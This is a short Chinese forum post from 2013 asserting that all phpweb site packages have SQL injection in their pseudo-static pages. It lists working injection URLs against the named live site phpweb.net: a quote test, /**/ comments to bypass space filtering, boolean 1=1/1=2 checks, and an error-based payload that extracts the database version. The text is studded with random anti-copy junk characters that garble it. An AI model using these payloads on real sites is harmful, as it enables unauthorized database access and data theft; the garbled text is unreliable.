phpweb所有的整站程序伪静态页面都存在sql注入
, S6 J' d. H3 `8 Y4 L& G+ t' f
! ~* u# ]0 l3 j6 H' s! {$ G主站:http://phpweb.net/8 a- p( p+ W. W# V7 k
加’检测:2 S3 |( x: M% j+ l. {
% g7 q. Y9 q/ y( A5 phttp://www.phpweb.net/down/html/?772′.html5 l# d# v8 v: i, O s
# J0 t4 M5 A7 F D& y
出错
$ ^+ B3 @+ r* y/ E" G存在注入。, a6 A8 I% d, X1 t
不能用空格,只能用/*罗
+ L- l) \1 o; {9 |4 z' e/ uhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
! }) t+ t8 j5 o l) T+ F
- |; {6 R+ ~2 ?6 {% i3 q( Ghttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.9 C! f4 S- n& H/ q4 A. ^
爆数据库版本:
* W' b4 U- }% j; g& q4 }
& U2 ]. S. j _9 [?/ Z0 X5 J3 _1 d: b
11 S* I3 K7 N {6 {
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html. B4 O+ I3 u% W: o; l. B7 L$ t
更新日期: 2013-01-03 13:39:50 ! N& _9 U) W F, b: Q, l$ o
|
发表于 2013-1-4 19:46:42
收藏
支持
反对